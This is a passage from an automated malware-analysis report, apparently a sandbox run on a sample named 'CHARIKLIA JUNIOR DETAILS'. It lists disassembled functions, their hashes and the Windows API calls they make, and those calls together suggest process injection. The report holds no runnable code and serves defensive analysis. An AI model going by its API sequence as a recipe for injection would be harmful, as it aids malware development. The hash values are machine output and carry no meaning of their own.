                                                              • Opcode ID: 791d8ccce490ba9e3b1bb4c6a350c4ed4798582c80d2014222da8fa6908b6e79
                                                              • Instruction ID: 7f55c661eb5daecdb59e1e68774e8ce97f04a447323ea8a92b709437df6031d5
                                                              • Opcode Fuzzy Hash: 791d8ccce490ba9e3b1bb4c6a350c4ed4798582c80d2014222da8fa6908b6e79
                                                              • Instruction Fuzzy Hash: 823148B5800249DFDB10CFAAD980ADEFFF4AB49320F14415AE958A7250C378A941CF61
                                                              Function 058377D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 285 58377d0-583781e 287 5837820-583782c 285->287 288 583782e-583786d WriteProcessMemory 285->288 287->288 290 5837876-58378a6 288->290 291 583786f-5837875 288->291 291->290
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05837860
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: a7bbf6db2b5277a127c14c9b6b7191348f93f8d8048e8ec371f42fad69f6f3bd
                                                              • Instruction ID: 9a42e750f1bcf6bfef370c24f09a7c0c14758495fb801c475c73ae7dd3d70ac5
                                                              • Opcode Fuzzy Hash: a7bbf6db2b5277a127c14c9b6b7191348f93f8d8048e8ec371f42fad69f6f3bd
                                                              • Instruction Fuzzy Hash: C92125B59003499FDB10DFAAC885BDEBBF5FF48310F50842AE919A7240C778A944CBA4
                                                              Function 058378B8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 295 58378b8-583794d ReadProcessMemory 298 5837956-5837986 295->298 299 583794f-5837955 295->299 299->298
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05837940
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: e587a951d8d185a70af53a4c9dd3497b61fde1f51003a94fa3cdab7eba5b63e5
                                                              • Instruction ID: 6f54ef92ba0aacafcd89870a45c7103ac779e9c87f3a502a4a11652c22358048
                                                              • Opcode Fuzzy Hash: e587a951d8d185a70af53a4c9dd3497b61fde1f51003a94fa3cdab7eba5b63e5
                                                              • Instruction Fuzzy Hash: F9214AB1C0034A9FDB10DFA9C881BDEBBF5FF48310F548429E919A7240D7789905CBA0
                                                              Function 05837638 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 303 5837638-5837683 305 5837693-58376c3 Wow64SetThreadContext 303->305 306 5837685-5837691 303->306 308 58376c5-58376cb 305->308 309 58376cc-58376fc 305->309 306->305 308->309
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058376B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 2e5f3de7fc65fe89272896515b3ef66cee82ccca30e5f8dcd291598ff5958a65
                                                              • Instruction ID: fd1ec8e9864ca6142151fec64dadb3087fcd8ded16b86c108c7b4575de7cbce1
                                                              • Opcode Fuzzy Hash: 2e5f3de7fc65fe89272896515b3ef66cee82ccca30e5f8dcd291598ff5958a65
                                                              • Instruction Fuzzy Hash: 872138B19003098FDB10DFAAC8857AEBBF5EF88310F548429D919A7240DB789944CFA4
                                                              Function 058378C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 313 58378c0-583794d ReadProcessMemory 316 5837956-5837986 313->316 317 583794f-5837955 313->317 317->316
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05837940
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: ad321e392328623bc696dda2d8216889a0e5070483c639fa37fd3059de0232df
                                                              • Instruction ID: 0ffcf4d12724ae03a36ff2d0c3e2f95b76b36ffc7d498d9590571f936632b6ad
                                                              • Opcode Fuzzy Hash: ad321e392328623bc696dda2d8216889a0e5070483c639fa37fd3059de0232df
                                                              • Instruction Fuzzy Hash: 092128B18003499FDB10DFAAC881BDEFBF5FF48320F508429E959A7240D7789904CBA4
                                                              Function 0115D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 321 115d5f0-115d684 DuplicateHandle 322 115d686-115d68c 321->322 323 115d68d-115d6aa 321->323 322->323
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0115D677
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 6a2885f3da762c55876e09d3e76666fc4d322b3112738d152012c1c5f6612e5e
                                                              • Instruction ID: eb2564282d8f05a66395293453070f5bf09bf8f1e8675442ad137dcfcceac578
                                                              • Opcode Fuzzy Hash: 6a2885f3da762c55876e09d3e76666fc4d322b3112738d152012c1c5f6612e5e
                                                              • Instruction Fuzzy Hash: ED21E4B5900209DFDB10CFAAD984ADEFBF8FB48310F14841AE918A3350D374A944CF65
                                                              Function 05837709 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0583777E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 81ab4e67d0117828d3e19d253921e8c9f52e0151f76b6447663a5680dd709061
                                                              • Instruction ID: 4537a6adc699f83e1b1241e9dc34b7da1015a635fe8b54b610e025b619df557f
                                                              • Opcode Fuzzy Hash: 81ab4e67d0117828d3e19d253921e8c9f52e0151f76b6447663a5680dd709061
                                                              • Instruction Fuzzy Hash: FE1126B68003499FDB10DFAAC945BDEBBF5EF48320F148819E919A7250CB799944CFA0
                                                              Function 05837710 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0583777E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: e3c5acf4884e3452c65304e95ffc0727cf49b87437390fb6ea38356f6d3fcf94
                                                              • Instruction ID: 18df9940f2e4e435358074c8af30ffe7832b2b7e65b651caf660a431bbfabf6b
                                                              • Opcode Fuzzy Hash: e3c5acf4884e3452c65304e95ffc0727cf49b87437390fb6ea38356f6d3fcf94
                                                              • Instruction Fuzzy Hash: E31134758003499FDB10DFAAC845BDFBBF5EF88720F148819E919A7250CB79A944CFA0
                                                              Function 05837580 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 4d2f2f344800f3bc72d22a45df155e6c22b35e17098b7b111ef3a5bbd9690607
                                                              • Instruction ID: 3b4ec98a0fdd933351f26caa384b9465159743b102daabf4d62936a717ae9b37
                                                              • Opcode Fuzzy Hash: 4d2f2f344800f3bc72d22a45df155e6c22b35e17098b7b111ef3a5bbd9690607
                                                              • Instruction Fuzzy Hash: F5115BB18003498FDB10DFAAC8457DEFBF5EF88310F248429D519A7240DB759904CF94
                                                              Function 05837588 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 0cc0a73ffc8629c41bd50f82a00553d64fd7f17af21b8be6bc996618c75f6d30
                                                              • Instruction ID: 0c88c9298eb283e9fcacae8be446c7ef641e0326d4f663c16915d2dbdba22f7b
                                                              • Opcode Fuzzy Hash: 0cc0a73ffc8629c41bd50f82a00553d64fd7f17af21b8be6bc996618c75f6d30
                                                              • Instruction Fuzzy Hash: 36113AB19003498FDB14DFAAC8457DEFBF9EF88720F248419D519A7240CB75A944CF94
                                                              Function 05835E40 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0583A27D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 14637f11fa16732fd747bd649b2ad87d9254b2678e64a03a584b96b4bb7fb6a9
                                                              • Instruction ID: 1f9b66872302947d172f64cb624c572d5a7a2db173e8b816865f65d344486417
                                                              • Opcode Fuzzy Hash: 14637f11fa16732fd747bd649b2ad87d9254b2678e64a03a584b96b4bb7fb6a9
                                                              • Instruction Fuzzy Hash: 911122B58003099FCB10DF8AC885BDEBBF8EB48320F108419E959A3200C375A984CFA1
                                                              Function 0115AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0115AF5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 534f86938827b70553ce6f2089995b133bb62f9f4bbcf1b826181a8354c3bdd4
                                                              • Instruction ID: d300ef1d043f937d7b7e7d19ab742b313d0891539841ec24e9aeb6d1438b728d
                                                              • Opcode Fuzzy Hash: 534f86938827b70553ce6f2089995b133bb62f9f4bbcf1b826181a8354c3bdd4
                                                              • Instruction Fuzzy Hash: A0110FB5C002498FDB14CF9AD844A9EFBF4AF88624F10851AD928A7250C379A545CFA1
                                                              Function 0583A21B Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0583A27D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 1f77f48e6e47de3671be293fbb1d8fd58d4a223337b5662334eabb3d52ef8f2c
                                                              • Instruction ID: 732516b74ca1004e66ab56260f465146ce3a5de89e18e075684681d550e6aeeb
                                                              • Opcode Fuzzy Hash: 1f77f48e6e47de3671be293fbb1d8fd58d4a223337b5662334eabb3d52ef8f2c
                                                              • Instruction Fuzzy Hash: 491103B58003499FDB10DF9AD885BDEFBF8FB48720F108419E958A3250C375A944CFA1
                                                              Function 010FD4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c9c4536e325249ff3d1d914eaa2cdfd0f42d51feafc04405f834a5e7d6080dd2
                                                              • Instruction ID: 203c298118c1439a63a11906103bb77a078ef0c843341502122d7eb242fb418c
                                                              • Opcode Fuzzy Hash: c9c4536e325249ff3d1d914eaa2cdfd0f42d51feafc04405f834a5e7d6080dd2
                                                              • Instruction Fuzzy Hash: 99213671504200DFDB01DF54D8C5B2ABFA1FB84718F20C1ADDA850B646C336D446CBA2
                                                              Function 010FD3D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87f937f61afcc9947b834266ead1b43a841b358a342a1bf64e58be255f19896e
                                                              • Instruction ID: 71a4c8979b2806eccb44730c1f77806eae8f3c247410ed9cab6cf733132f58fe
                                                              • Opcode Fuzzy Hash: 87f937f61afcc9947b834266ead1b43a841b358a342a1bf64e58be255f19896e
                                                              • Instruction Fuzzy Hash: 75213671504304DFDB05DF44D9C5B5ABBA5FB84324F20C1ADEA490B646C73AF446CBA2
                                                              Function 0110D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f1bd8677a62078c4a537671aa0ad1a5fc566e7d19a822d029328bf8a46dd6d2
                                                              • Instruction ID: 0c673c6cc852253016fe53c17d72baafee5a59b48d5eb6d78e8615e9b7f840de
                                                              • Opcode Fuzzy Hash: 2f1bd8677a62078c4a537671aa0ad1a5fc566e7d19a822d029328bf8a46dd6d2
                                                              • Instruction Fuzzy Hash: C521F575A04304EFDF0ADF94E9C4B25BB65FB84324F20C56DE8494B296C3B6D446CA62
                                                              Function 0110D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25186ed0ce621b583bcedfaabaea0cb175a4fd649424a850ed4cc61b0020a5ad
                                                              • Instruction ID: 914e0fd2389c94d75b7ba95f6f90367a9ac4f0d222bb7b1735a7c3071f85d3da
                                                              • Opcode Fuzzy Hash: 25186ed0ce621b583bcedfaabaea0cb175a4fd649424a850ed4cc61b0020a5ad
                                                              • Instruction Fuzzy Hash: D4210375A04304DFDF1ADF94E884B16BB65FB84314F20C56DD84D4B28AC3B6D407CA62
                                                              Function 010FD3D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction ID: 54e26bd903ef6a4e0fccc227cc795237853c4a5f9cd25dbe9179d021a6a1cbf3
                                                              • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction Fuzzy Hash: 1611CD76504240CFCB02CF44D5C0B56BFA2FB84224F2482ADD9490A657C33AE456CBA2
                                                              Function 010FD4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction ID: 5f3b27bd411becadc57ec4a45e1d369f806402c2820661cb842e464718003307
                                                              • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction Fuzzy Hash: 2D11CD76504280CFCB02CF54D5C4B16BFA2FB84624F2486ADD9490B656C33AD45ACBA2
                                                              Function 0110D017 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction ID: b5a75fdc6aa4713968c64f86921be1042b24aca4326e4ab18d235321aeb9ca42
                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction Fuzzy Hash: 3E11BE75904284CFCB16CF54E5C4B15BB62FB44324F24C6A9D8494B69AC37AD40ACB62
                                                              Function 0110D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction ID: b832214ca1b7a0d2b060d1c2d9c9f0ed0ce59a33585e2c0856b7cba4ef20998b
                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction Fuzzy Hash: 6D11BB75904280DFCB06CF98D5C0B15BBA2FB84224F24C6ADD8494B696C37AD40ACB62
                                                              Function 010FD759 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db652e9a29d746c7a47c6ef244a0551ebbe24a85ea0aa1a072af749569e78edf
                                                              • Instruction ID: 734726fad148249a893a415ecb9f408913afba0a45a7a4346a46a04bf194c41a
                                                              • Opcode Fuzzy Hash: db652e9a29d746c7a47c6ef244a0551ebbe24a85ea0aa1a072af749569e78edf
                                                              • Instruction Fuzzy Hash: E101F2710043849BE7604AA5CCC5B6AFFD8FF81625F18C55EEE484EA86D3799840CBB2
                                                              Function 010FD758 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b5cac70e9d43b36c9e874b2cc8882fb35e97fc427cd46d9778e1e16e177c478
                                                              • Instruction ID: e56f24581bc13a2648bb98991f59da62fe1af4ba8f8d7c69a17bfc0de8d23498
                                                              • Opcode Fuzzy Hash: 6b5cac70e9d43b36c9e874b2cc8882fb35e97fc427cd46d9778e1e16e177c478
                                                              • Instruction Fuzzy Hash: 71F0C2310043849EE7508A0ACC84B62FFE8EF80634F18C49EEE484E296C279A844CBB1

                                                              Non-executed Functions

                                                              Function 05836D60 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d120e0a418c7e00765de0388991123f09b92c3725536dbcc7110de5a9fa8c20c
                                                              • Instruction ID: 21cddf89273983dded63f71a0c3773ee3280a746933830c4ef6912adc50f8e16
                                                              • Opcode Fuzzy Hash: d120e0a418c7e00765de0388991123f09b92c3725536dbcc7110de5a9fa8c20c
                                                              • Instruction Fuzzy Hash: 81E1F874E002199FDB14DFA9C5819AEBBF2FF89304F248169E854AB355D731AD42CFA0
                                                              Function 05834E48 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb809feb56a53bc8585163ba746158568dc31b92faab41210f92812dd75b151d
                                                              • Instruction ID: daa1d466ad5200c7cb6f90db7ffa6f1d8ac9fb621de3451d87d8ef76dc337129
                                                              • Opcode Fuzzy Hash: eb809feb56a53bc8585163ba746158568dc31b92faab41210f92812dd75b151d
                                                              • Instruction Fuzzy Hash: 35E1E674E042198FDB14DFA9C581AAEBBF2FF89305F248169E814AB355D731AD41CFA0
                                                              Function 05836928 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc59f7f0f293332cc6cf9ede0c1620a97f4c0a3429461409922f43b46d90c423
                                                              • Instruction ID: d01bec78e647da0e08d0462a5119a993af7d7d88343cb4882b4c677983680f35
                                                              • Opcode Fuzzy Hash: dc59f7f0f293332cc6cf9ede0c1620a97f4c0a3429461409922f43b46d90c423
                                                              • Instruction Fuzzy Hash: 62E10974E002199FDB14DFA9C581AAEBBF2FF89305F248169D814AB355DB319D42CFA0
                                                              Function 05835280 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c8af4d702d1f8a7e939b1575b36e620c5a2fd8098faf0bf75b5706581427475
                                                              • Instruction ID: 79a90c7b66c6cbfcf7338070f26a724c25ddbff12c79513bfbdc26e947d6e347
                                                              • Opcode Fuzzy Hash: 5c8af4d702d1f8a7e939b1575b36e620c5a2fd8098faf0bf75b5706581427475
                                                              • Instruction Fuzzy Hash: 10E10674E042198FDB14DF99C581AAEBBB2FF89305F248569E814AB315D730AD42CFA0
                                                              Function 05834A10 Relevance: .3, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc54d31c38bf01bf1126887fd98fd868dcaf8d4f36867274abc006c036e4e3d5
                                                              • Instruction ID: 05fbbaaefc2b386bace01705e2c5aacb9f24145821dd2d7301b0869873d76544
                                                              • Opcode Fuzzy Hash: fc54d31c38bf01bf1126887fd98fd868dcaf8d4f36867274abc006c036e4e3d5
                                                              • Instruction Fuzzy Hash: 23E10974E042198FDB14DF99C585AAEBBF2FF89305F248169E814A7315D731AD42CFA0
                                                              Function 0115D51C Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f265b839ac9e44f0541a3dfcf5c56a874c9781f8ae89cfe95bee1a58c6101816
                                                              • Instruction ID: dc16ef9975ff605265b50032d9bc7962918a7473ba75b1d6ec75ff2bec7e9682
                                                              • Opcode Fuzzy Hash: f265b839ac9e44f0541a3dfcf5c56a874c9781f8ae89cfe95bee1a58c6101816
                                                              • Instruction Fuzzy Hash: B8A1A532E1020ACFCF19DFB4C88459EBBB6FF85304B1545A9ED11AB255DB71E916CB40
                                                              Function 058349FC Relevance: .1, Instructions: 133COMMON
                                                              Download Yara Rule
